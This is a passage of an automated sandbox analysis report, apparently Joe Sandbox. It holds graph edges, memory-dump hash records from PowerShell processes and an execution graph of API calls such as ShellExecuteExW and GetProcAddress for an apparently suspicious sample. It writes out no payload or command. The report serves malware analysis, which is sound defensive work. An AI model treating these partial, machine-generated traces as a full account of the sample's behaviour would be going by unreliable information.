7ffd9b9817f0-7ffd9b9817f9 519->524 525 7ffd9b981805-7ffd9b981809 519->525 524->525 525->497 535 7ffd9b98180f-7ffd9b981815 525->535 531 7ffd9b9819f1 526->531 532 7ffd9b9819f8-7ffd9b981a75 526->532 527->526 533 7ffd9b9817bf-7ffd9b9817d4 528->533 534 7ffd9b9817d6-7ffd9b9817df 528->534 531->532 543 7ffd9b981ae8-7ffd9b981af2 532->543 544 7ffd9b981a77-7ffd9b981a87 532->544 533->534 534->518 539 7ffd9b981831-7ffd9b981837 535->539 540 7ffd9b981817-7ffd9b981824 535->540 541 7ffd9b981853-7ffd9b981890 539->541 542 7ffd9b981839-7ffd9b981846 539->542 540->539 550 7ffd9b981826-7ffd9b98182f 540->550 570 7ffd9b981892-7ffd9b9818a7 541->570 571 7ffd9b9818a9-7ffd9b9818ba 541->571 542->541 554 7ffd9b981848-7ffd9b981851 542->554 551 7ffd9b981af4-7ffd9b981af9 543->551 552 7ffd9b981afc-7ffd9b981b41 543->552 556 7ffd9b981a94-7ffd9b981aaa 544->556 557 7ffd9b981a89-7ffd9b981a92 544->557 550->539 558 7ffd9b981afa-7ffd9b981afb 551->558 554->541 556->558 566 7ffd9b981aac-7ffd9b981ae5 556->566 557->556 570->571
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1771678007.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ca67d51f2b4fe72aaf6ceb4f38f0434e41a300a0a9bffd87a0b108b761b2d27e
                                                                    • Instruction ID: c89633c721b269e1bed4622d11ba3533180e7075f1c13b40179ea282b8962268
                                                                    • Opcode Fuzzy Hash: ca67d51f2b4fe72aaf6ceb4f38f0434e41a300a0a9bffd87a0b108b761b2d27e
                                                                    • Instruction Fuzzy Hash: 05122621A1FBD91FE366877868256707BE1EF56214B0A01FFD089C71F3DA289D46C352
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1770932946.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: gK_^
                                                                    • API String ID: 0-1250578415
                                                                    • Opcode ID: 7bad8f23254a061f4b621b904fdd130bcd4458321c68fcb014923c3e20e5be52
                                                                    • Instruction ID: 6190694c3741a810a7e224b49f49f750dcec087c10302909109189dbc0b048f5
                                                                    • Opcode Fuzzy Hash: 7bad8f23254a061f4b621b904fdd130bcd4458321c68fcb014923c3e20e5be52
                                                                    • Instruction Fuzzy Hash: D5620771B0EA494FEB699B6C98756B83BD2EFD9314B0902BFD44DC72E3DD15A8028341
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1770932946.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: _J_H
                                                                    • API String ID: 0-2315468999
                                                                    • Opcode ID: 3fd6d5ae39ce73c68219de8c59a57222cb8343baabb91ccd15578a6e8dd56748
                                                                    • Instruction ID: 2c8de292c85571c22c7ffb8df039bee2abd3a14ebb3bcf1e6273097ed5221f23
                                                                    • Opcode Fuzzy Hash: 3fd6d5ae39ce73c68219de8c59a57222cb8343baabb91ccd15578a6e8dd56748
                                                                    • Instruction Fuzzy Hash: 6B42BF71B19A0E4FEBA4FB6C9864A7977E1FF98340F0501BAE44DC76A6DE24EC418740
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1770932946.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6321a82af9333169b2f7f73ac0c133f51296bd637516e2130a0c2e3cdc09c28
                                                                    • Instruction ID: 9ccae259777957fd2a38d43fe4a7f56ab6817e9175224c8632eabb16505c8ece
                                                                    • Opcode Fuzzy Hash: d6321a82af9333169b2f7f73ac0c133f51296bd637516e2130a0c2e3cdc09c28
                                                                    • Instruction Fuzzy Hash: 68120747B0F6BA4AE31A63BD78B54E97F50DF8623970943F7C1DD8A0A7AC08544B82D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1873935682.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5d34c49f9cfb372a653eb4e85334801142047df0cc700813aa3ab53b40603b19
                                                                    • Instruction ID: fd59dfb58272e253a39b0864e2adc67d5c69bd5104a4370cf794255c5407c913
                                                                    • Opcode Fuzzy Hash: 5d34c49f9cfb372a653eb4e85334801142047df0cc700813aa3ab53b40603b19
                                                                    • Instruction Fuzzy Hash: 63D15532B1EB8E9FEBA5ABA858645F57BE1EF12314B0901FED45CC70E3D918A901C341
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1873935682.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 06970f4c6e117df87c3932f33479f0094710337221f20002292f1c5bb502edb4
                                                                    • Instruction ID: e8162d7a6713064f106c5630bf4988b11ed279758e4811fece1be101385a8be3
                                                                    • Opcode Fuzzy Hash: 06970f4c6e117df87c3932f33479f0094710337221f20002292f1c5bb502edb4
                                                                    • Instruction Fuzzy Hash: 57513832B1EA4A9FEBA9DA9C542277477D2EFA5210B1A40BEC05DC72E3DE14ED058341
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1873935682.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 11ce03aa4ca06b9ca3f83784fb10e89f5bd7bff5b3f9aaa5fd41be4712903e29
                                                                    • Instruction ID: feb28b2a684bac96572d244030a737487a335fd47fb4c087597918eb2ad62278
                                                                    • Opcode Fuzzy Hash: 11ce03aa4ca06b9ca3f83784fb10e89f5bd7bff5b3f9aaa5fd41be4712903e29
                                                                    • Instruction Fuzzy Hash: 52415A32B1EA499FEBB9D6AC5421AB477D1EF84720B0900BFD05DC72E3EA14ED018381
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1873390889.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 20596c4049cfe7169c190d95b269efc737e654784bd85b6ef898d2f1481f6a2d
                                                                    • Instruction ID: b5b78a40fa27ebd86281b6936952ae0e26dba9d054ced305cd7f8cf32c0eacdf
                                                                    • Opcode Fuzzy Hash: 20596c4049cfe7169c190d95b269efc737e654784bd85b6ef898d2f1481f6a2d
                                                                    • Instruction Fuzzy Hash: 5C413B71A0DE4C9FDB589F5C981A6E87BE0FF99311F40412FE449D3292CB20A956CBC2
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1872818558.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd9b77d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec1370dd6a4b7136f3df50edab7cb7cb9132ef598724978591b1c89c6dc4f1b5
                                                                    • Instruction ID: 45a0124b897f6df5ceef47d72945b082b388093175f61ef417eac3b609b837a4
                                                                    • Opcode Fuzzy Hash: ec1370dd6a4b7136f3df50edab7cb7cb9132ef598724978591b1c89c6dc4f1b5
                                                                    • Instruction Fuzzy Hash: 7931447140DBC44FE75A9B3898959523FF0EF46320B1A06DFE088CB1B3D625E846CB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1873390889.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 217516ea8bfb14a1290cdda819bf435a9fb514c8beee370f6426fe0c9dc4c1c9
                                                                    • Instruction ID: 34e868698c7bd1af8f64d3c348560e016ba71e2622187f0568d75a6dbe1f0697
                                                                    • Opcode Fuzzy Hash: 217516ea8bfb14a1290cdda819bf435a9fb514c8beee370f6426fe0c9dc4c1c9
                                                                    • Instruction Fuzzy Hash: 5531706BE0BEDD9AFB125B6CAC654E43FA0FF15B29B0943F3C4D8860A3FD2511464681
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1873390889.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6fd05754542343e9700044be0bc25bd556e363214496cf5c34a1d2efe28af198
                                                                    • Instruction ID: bbe889627879f2909c36aef876948af0f1e2af0ad032c855615e96557ddb024f
                                                                    • Opcode Fuzzy Hash: 6fd05754542343e9700044be0bc25bd556e363214496cf5c34a1d2efe28af198
                                                                    • Instruction Fuzzy Hash: 4621F83190CB4C8FDB59DBAC984A7E97FE0EB9A321F04416BD049C7162DA749416CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1873935682.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e9e4d85f42969806ca31619b7633d62ff48852901ef6e9355325bcc158a519eb
                                                                    • Instruction ID: c8dce10d2fb55798260cc77a17cd3fb9919776f525553f610ea7fcf6562a9f5c
                                                                    • Opcode Fuzzy Hash: e9e4d85f42969806ca31619b7633d62ff48852901ef6e9355325bcc158a519eb
                                                                    • Instruction Fuzzy Hash: 6B21C222F2F98BAFE7B9DA98446227467C1EF65210B4B40BED05DC76A2DE18ED058341
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1873935682.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9dade3a3ea0a21dc736c6b28b6cb63cbfd044b6b21ca5527ea45584b37763321
                                                                    • Instruction ID: d3ee35796e1b6bbed8ebd2979ad5e3984bc2754f9ec14729e52f4a8d6a9f4cca
                                                                    • Opcode Fuzzy Hash: 9dade3a3ea0a21dc736c6b28b6cb63cbfd044b6b21ca5527ea45584b37763321
                                                                    • Instruction Fuzzy Hash: 16110232F1F5499FE7B9D6989471AB477D0FF40720B4A00BEE02DC76A2DA18AD018340
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1873390889.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1873390889.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M_^4$M_^7$M_^F$M_^J
                                                                    • API String ID: 0-622050427
                                                                    • Opcode ID: 45a89b391d96fdc3419dc800f8f5886b52914b3e3631deac189cb41203ae0576
                                                                    • Instruction ID: 67c483b31486e148cdd38e4893d325e3edbe53289e8afd099b86490093a99135
                                                                    • Opcode Fuzzy Hash: 45a89b391d96fdc3419dc800f8f5886b52914b3e3631deac189cb41203ae0576
                                                                    • Instruction Fuzzy Hash: 9321C2A7708565DED30A7B7DBC189E93740CF9427878507F3E1AACB093F91860878AD0

                                                                    Execution Graph

                                                                    Execution Coverage:6.2%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:4.8%
                                                                    Total number of Nodes:923
                                                                    Total number of Limit Nodes:3
                                                                    execution_graph 2764 7ff64d6073a0 2765 7ff64d6073aa 2764->2765 2766 7ff64d6073b7 2764->2766 2768 7ff64d606714 AcquireSRWLockShared 2765->2768 2769 7ff64d606752 ReleaseSRWLockShared 2768->2769 2770 7ff64d606761 2768->2770 2769->2770 2771 7ff64d60676c EnterCriticalSection AcquireSRWLockExclusive 2770->2771 2772 7ff64d606816 2770->2772 2773 7ff64d6067d9 ReleaseSRWLockExclusive 2770->2773 2774 7ff64d6067fe LeaveCriticalSection 2770->2774 2771->2770 2772->2766 2773->2770 2774->2770 2775 7ff64d6077a0 2776 7ff64d6077be 2775->2776 2777 7ff64d60786b 2775->2777 2778 7ff64d6070e8 52 API calls 2776->2778 2779 7ff64d6077fe 2778->2779 2779->2777 2785 7ff64d606920 2779->2785 2782 7ff64d607839 AcquireSRWLockExclusive 2801 7ff64d607198 2782->2801 2810 7ff64d605dcc 2785->2810 2788 7ff64d6069f3 AcquireSRWLockExclusive 2834 7ff64d6055c8 2788->2834 2791 7ff64d604994 6 API calls 2797 7ff64d6069bc 2791->2797 2792 7ff64d605dcc 8 API calls 2794 7ff64d6069ea 2792->2794 2793 7ff64d606a48 ReleaseSRWLockExclusive 2798 7ff64d6069ee 2793->2798 2794->2788 2794->2798 2795 7ff64d606a7c 2799 7ff64d60a080 7 API calls 2795->2799 2796 7ff64d606a5c GetProcessHeap HeapFree 2796->2795 2797->2792 2797->2798 2798->2795 2798->2796 2800 7ff64d606a8b 2799->2800 2800->2777 2800->2782 2802 7ff64d607244 ReleaseSRWLockExclusive 2801->2802 2803 7ff64d6071b9 2801->2803 2802->2777 2804 7ff64d607214 SetThreadpoolTimer 2803->2804 2805 7ff64d6071c2 CreateThreadpoolTimer 2803->2805 2804->2802 2806 7ff64d60720b 2805->2806 2807 7ff64d6071e7 GetLastError 2805->2807 2806->2802 2806->2804 2904 7ff64d6096c8 SetThreadpoolTimer WaitForThreadpoolTimerCallbacks CloseThreadpoolTimer 2807->2904 2811 7ff64d605e1a 2810->2811 2812 7ff64d605e8a 2811->2812 2848 7ff64d605fa0 2811->2848 2814 7ff64d605ea3 2812->2814 2815 7ff64d605fa0 memcpy_s 2812->2815 2816 7ff64d605fa0 memcpy_s 2814->2816 2817 7ff64d605ebe 2814->2817 2815->2814 2816->2817 2819 7ff64d605ed9 2817->2819 2820 7ff64d605fa0 memcpy_s 2817->2820 2818 7ff64d605ef2 2822 7ff64d605f0d 2818->2822 2823 7ff64d605fa0 memcpy_s 2818->2823 2819->2818 2821 7ff64d605fa0 memcpy_s 2819->2821 2820->2819 2821->2818 2824 7ff64d605f28 2822->2824 2825 7ff64d605fa0 memcpy_s 2822->2825 2823->2822 2826 7ff64d605f43 2824->2826 2827 7ff64d605fa0 memcpy_s 2824->2827 2825->2824 2828 7ff64d605f5e 2826->2828 2830 7ff64d605fa0 memcpy_s 2826->2830 2827->2826 2829 7ff64d605f77 2828->2829 2831 7ff64d605fa0 memcpy_s 2828->2831 2832 7ff64d60a080 7 API calls 2829->2832 2830->2828 2831->2829 2833 7ff64d605f8d 2832->2833 2833->2788 2833->2791 2833->2797 2852 7ff64d605a14 2834->2852 2837 7ff64d605611 2837->2793 2837->2798 2838 7ff64d6056cf 2841 7ff64d6056fb 2838->2841 2844 7ff64d604994 6 API calls 2838->2844 2839 7ff64d60562d 2840 7ff64d604994 6 API calls 2839->2840 2843 7ff64d60564d 2840->2843 2842 7ff64d605a14 16 API calls 2841->2842 2842->2837 2846 7ff64d60569d 2843->2846 2847 7ff64d60567d GetProcessHeap HeapFree 2843->2847 2844->2841 2845 7ff64d6056ad GetProcessHeap HeapFree 2845->2841 2846->2841 2846->2845 2847->2846 2849 7ff64d605fc1 2848->2849 2849->2849 2850 7ff64d606015 memcpy_s 2849->2850 2851 7ff64d605fe8 2849->2851 2850->2851 2851->2812 2853 7ff64d605a52 2852->2853 2869 7ff64d60560d 2852->2869 2871 7ff64d6052a4 2853->2871 2855 7ff64d605a8b 2856 7ff64d605a9d memcmp 2855->2856 2857 7ff64d605bf4 2855->2857 2858 7ff64d605c30 2855->2858 2862 7ff64d6052a4 memcpy_s memcpy_s memcpy_s 2855->2862 2863 7ff64d605bc1 memcpy_s 2855->2863 2865 7ff64d605b1f memcpy_s 2855->2865 2856->2855 2860 7ff64d605cf6 memmove_s 2857->2860 2857->2869 2879 7ff64d60573c 2858->2879 2861 7ff64d605d25 2860->2861 2868 7ff64d605d34 2860->2868 2896 7ff64d6051a8 2861->2896 2862->2855 2863->2855 2865->2855 2866 7ff64d605d32 2867 7ff64d6051a8 3 API calls 2866->2867 2867->2869 2868->2866 2870 7ff64d605d77 memcpy_s 2868->2870 2869->2837 2869->2838 2869->2839 2870->2866 2872 7ff64d605303 2871->2872 2873 7ff64d6052ce 2871->2873 2874 7ff64d605369 2872->2874 2876 7ff64d605331 2872->2876 2877 7ff64d605317 memcpy_s 2872->2877 2873->2874 2875 7ff64d6052db memcpy_s 2873->2875 2874->2855 2875->2876 2876->2874 2878 7ff64d60534d memcpy_s 2876->2878 2877->2876 2878->2874 2884 7ff64d60579c 2879->2884 2891 7ff64d6058da 2879->2891 2880 7ff64d6057f0 2883 7ff64d60588c 2880->2883 2886 7ff64d6052a4 3 API calls 2880->2886 2890 7ff64d605855 memcmp 2880->2890 2881 7ff64d6059da 2881->2857 2882 7ff64d6052a4 3 API calls 2882->2891 2883->2881 2887 7ff64d6052a4 3 API calls 2883->2887 2884->2880 2885 7ff64d6057e0 memcpy_s 2884->2885 2885->2880 2886->2880 2888 7ff64d6058ab 2887->2888 2892 7ff64d6058b4 memcmp 2888->2892 2894 7ff64d6058cc 2888->2894 2889 7ff64d605939 2893 7ff64d605966 memcpy_s 2889->2893 2889->2894 2890->2880 2891->2881 2891->2882 2891->2889 2891->2894 2892->2894 2893->2894 2894->2881 2895 7ff64d6059c7 memcpy_s 2894->2895 2895->2881 2898 7ff64d6051cd 2896->2898 2897 7ff64d60525f 2897->2866 2898->2897 2899 7ff64d605220 2898->2899 2901 7ff64d60520e memcpy_s 2898->2901 2899->2897 2900 7ff64d605251 2899->2900 2902 7ff64d60522f memcpy_s 2899->2902 2900->2897 2903 7ff64d605263 memcpy_s 2900->2903 2901->2899 2902->2900 2903->2897 3196 7ff64d6022e0 3197 7ff64d602309 3196->3197 3198 7ff64d6022ee 3196->3198 3200 7ff64d6021a0 3198->3200 3201 7ff64d6021ff 3200->3201 3202 7ff64d6021d9 GetModuleHandleExW 3200->3202 3203 7ff64d60221f GetModuleFileNameA 3201->3203 3206 7ff64d6021f6 3201->3206 3202->3201 3202->3206 3203->3206 3204 7ff64d60a080 7 API calls 3205 7ff64d6022c6 3204->3205 3205->3197 3206->3204 2905 7ff64d609cb0 2906 7ff64d609cc2 2905->2906 2912 7ff64d60a3e8 GetModuleHandleW 2906->2912 2908 7ff64d609d29 __set_app_type 2909 7ff64d609d66 2908->2909 2910 7ff64d609d7c 2909->2910 2911 7ff64d609d6f __setusermatherr 2909->2911 2911->2910 2913 7ff64d60a3fd 2912->2913 2913->2908 3207 7ff64d609b70 3208 7ff64d609b82 AcquireSRWLockExclusive 3207->3208 3209 7ff64d609bb5 3207->3209 3210 7ff64d607b2c 7 API calls 3208->3210 3211 7ff64d609b9d 3210->3211 3211->3209 3212 7ff64d609ba6 ReleaseSRWLockExclusive 3211->3212 3212->3209 3213 7ff64d609af0 3214 7ff64d609b07 AcquireSRWLockExclusive 3213->3214 3215 7ff64d609b55 3213->3215 3216 7ff64d609b36 3214->3216 3217 7ff64d609b2e 3214->3217 3216->3215 3219 7ff64d609b46 ReleaseSRWLockExclusive 3216->3219 3220 7ff64d604ed4 3217->3220 3219->3215 3223 7ff64d604efd 3220->3223 3221 7ff64d60506e 3222 7ff64d60a080 7 API calls 3221->3222 3225 7ff64d605084 3222->3225 3223->3221 3224 7ff64d6039c4 2 API calls 3223->3224 3227 7ff64d603a6c 3223->3227 3224->3223 3225->3216 3228 7ff64d603adb 3227->3228 3229 7ff64d603a90 3227->3229 3228->3223 3230 7ff64d603a9c GetModuleHandleW 3229->3230 3231 7ff64d603ab6 GetProcAddress 3229->3231 3230->3231 3231->3228 2914 7ff64d604b32 2915 7ff64d604b68 2914->2915 2916 7ff64d604b48 2914->2916 2917 7ff64d604b4e 2916->2917 2918 7ff64d604b5a 2916->2918 2920 7ff64d604cb3 2917->2920 2926 7ff64d60112c 2917->2926 2918->2915 2922 7ff64d604cc4 2918->2922 2923 7ff64d604ce0 2922->2923 2924 7ff64d604e16 2922->2924 2932 7ff64d6013e4 2923->2932 2924->2915 2927 7ff64d601175 2926->2927 2939 7ff64d601090 EventWriteTransfer 2927->2939 2929 7ff64d6013b6 2930 7ff64d60a080 7 API calls 2929->2930 2931 7ff64d6013c2 2930->2931 2931->2920 2933 7ff64d60142e 2932->2933 2933->2933 2938 7ff64d601090 EventWriteTransfer 2933->2938 2935 7ff64d6016c3 2936 7ff64d60a080 7 API calls 2935->2936 2937 7ff64d6016cf 2936->2937 2937->2924 2938->2935 2939->2929 2945 7ff64d603830 2946 7ff64d60384a 2945->2946 2949 7ff64d603892 2945->2949 2947 7ff64d603870 GetProcAddress 2946->2947 2948 7ff64d603856 GetModuleHandleW 2946->2948 2947->2949 2948->2947 3232 7ff64d604e70 3233 7ff64d604e90 EventUnregister 3232->3233 3234 7ff64d604eaa 3232->3234 3233->3234 3235 7ff64d604eb0 ??3@YAXPEAX 3234->3235 3236 7ff64d604ebf 3234->3236 3235->3236 2467 7ff64d609de0 GetStartupInfoW 2468 7ff64d609e1f 2467->2468 2469 7ff64d609e31 2468->2469 2470 7ff64d609e3a Sleep 2468->2470 2471 7ff64d609e56 _amsg_exit 2469->2471 2473 7ff64d609e64 2469->2473 2470->2468 2471->2473 2472 7ff64d609eda _initterm 2474 7ff64d609ef7 _IsNonwritableInCurrentImage 2472->2474 2473->2472 2473->2474 2480 7ff64d609ebb 2473->2480 2474->2480 2481 7ff64d6086fc 2474->2481 2476 7ff64d609fa9 2477 7ff64d609fb8 exit 2476->2477 2478 7ff64d609fc0 2476->2478 2477->2478 2479 7ff64d609fc9 _cexit 2478->2479 2478->2480 2479->2480 2482 7ff64d608717 2481->2482 2483 7ff64d608727 2481->2483 2498 7ff64d609714 2482->2498 2487 7ff64d603dd4 2483->2487 2488 7ff64d603e1d 2487->2488 2489 7ff64d603ee2 2488->2489 2492 7ff64d603f3b 2488->2492 2504 7ff64d607f30 2489->2504 2490 7ff64d603efb 2513 7ff64d60a080 2490->2513 2492->2490 2494 7ff64d603f6d 2492->2494 2495 7ff64d603f93 GetProcAddress 2494->2495 2496 7ff64d603f79 GetModuleHandleW 2494->2496 2495->2490 2496->2495 2499 7ff64d609738 2498->2499 2502 7ff64d609830 2498->2502 2749 7ff64d607d74 2499->2749 2502->2483 2505 7ff64d607f50 2504->2505 2506 7ff64d60803e 2504->2506 2507 7ff64d607f8e 2505->2507 2536 7ff64d607948 2505->2536 2506->2490 2507->2506 2509 7ff64d607fd4 AcquireSRWLockExclusive 2507->2509 2510 7ff64d607ff1 2509->2510 2511 7ff64d608029 ReleaseSRWLockExclusive 2509->2511 2510->2511 2521 7ff64d606e80 2510->2521 2511->2506 2514 7ff64d60a089 2513->2514 2515 7ff64d60400c memset ShellExecuteExW 2514->2515 2516 7ff64d60a0e0 RtlCaptureContext RtlLookupFunctionEntry 2514->2516 2515->2476 2517 7ff64d60a167 2516->2517 2518 7ff64d60a125 RtlVirtualUnwind 2516->2518 2748 7ff64d60a0a4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2517->2748 2518->2517 2522 7ff64d606f5f 2521->2522 2523 7ff64d606eae 2521->2523 2522->2511 2550 7ff64d6070e8 2523->2550 2526 7ff64d606ebb AcquireSRWLockExclusive 2527 7ff64d606f23 2526->2527 2528 7ff64d606ed8 2526->2528 2529 7ff64d6065dc 7 API calls 2527->2529 2528->2527 2530 7ff64d606edf AcquireSRWLockExclusive 2528->2530 2531 7ff64d606f38 2529->2531 2558 7ff64d6065dc 2530->2558 2531->2522 2535 7ff64d606f50 ReleaseSRWLockExclusive 2531->2535 2534 7ff64d606f14 ReleaseSRWLockExclusive 2534->2527 2535->2522 2537 7ff64d607a6e 2536->2537 2538 7ff64d60796b 2536->2538 2537->2507 2538->2537 2539 7ff64d607995 AcquireSRWLockExclusive 2538->2539 2540 7ff64d604aa4 7 API calls 2539->2540 2541 7ff64d6079c5 2540->2541 2542 7ff64d607a5a 2541->2542 2543 7ff64d607a2a SetThreadpoolTimer 2541->2543 2544 7ff64d6079d8 CreateThreadpoolTimer 2541->2544 2542->2537 2545 7ff64d607a5f ReleaseSRWLockExclusive 2542->2545 2543->2542 2546 7ff64d607a21 2544->2546 2547 7ff64d6079fd GetLastError 2544->2547 2545->2537 2546->2542 2546->2543 2747 7ff64d6096c8 SetThreadpoolTimer WaitForThreadpoolTimerCallbacks CloseThreadpoolTimer 2547->2747 2551 7ff64d607104 2550->2551 2556 7ff64d606eb3 2550->2556 2552 7ff64d60712f AcquireSRWLockExclusive 2551->2552 2562 7ff64d608a64 GetCurrentProcessId 2551->2562 2554 7ff64d60715c 2552->2554 2554->2556 2557 7ff64d607168 ReleaseSRWLockExclusive 2554->2557 2556->2522 2556->2526 2557->2556 2559 7ff64d606609 2558->2559 2561 7ff64d60663f 2559->2561 2734 7ff64d604aa4 2559->2734 2561->2527 2561->2534 2604 7ff64d601d78 2562->2604 2565 7ff64d608af6 2640 7ff64d60241c GetLastError 2565->2640 2566 7ff64d608b02 WaitForSingleObjectEx 2567 7ff64d608b1e 2566->2567 2570 7ff64d608d89 2567->2570 2607 7ff64d60985c 2567->2607 2569 7ff64d608afb 2572 7ff64d60a080 7 API calls 2569->2572 2689 7ff64d602b4c 2570->2689 2575 7ff64d60711b 2572->2575 2575->2552 2577 7ff64d608b74 2579 7ff64d608b85 2577->2579 2580 7ff64d608bea GetProcessHeap HeapAlloc 2577->2580 2590 7ff64d608b94 2577->2590 2581 7ff64d602ad4 13 API calls 2579->2581 2582 7ff64d608c40 2580->2582 2583 7ff64d608c21 GetProcessHeap 2580->2583 2581->2590 2584 7ff64d608c4a 2582->2584 2585 7ff64d608c6b 2582->2585 2583->2582 2586 7ff64d602ad4 13 API calls 2584->2586 2587 7ff64d608c7e 2585->2587 2588 7ff64d608d83 2585->2588 2589 7ff64d608c66 2586->2589 2665 7ff64d602cd0 2587->2665 2588->2570 2589->2579 2589->2590 2590->2569 2647 7ff64d602be4 CloseHandle 2590->2647 2594 7ff64d608c9a 2597 7ff64d602ad4 13 API calls 2594->2597 2595 7ff64d608cf1 memset 2688 7ff64d60640c 2595->2688 2599 7ff64d608cb1 2597->2599 2598 7ff64d608d2f InitializeCriticalSectionEx 2598->2589 2600 7ff64d608cc0 2599->2600 2601 7ff64d602be4 20 API calls 2599->2601 2602 7ff64d608ccf GetProcessHeap HeapFree 2600->2602 2603 7ff64d602be4 20 API calls 2600->2603 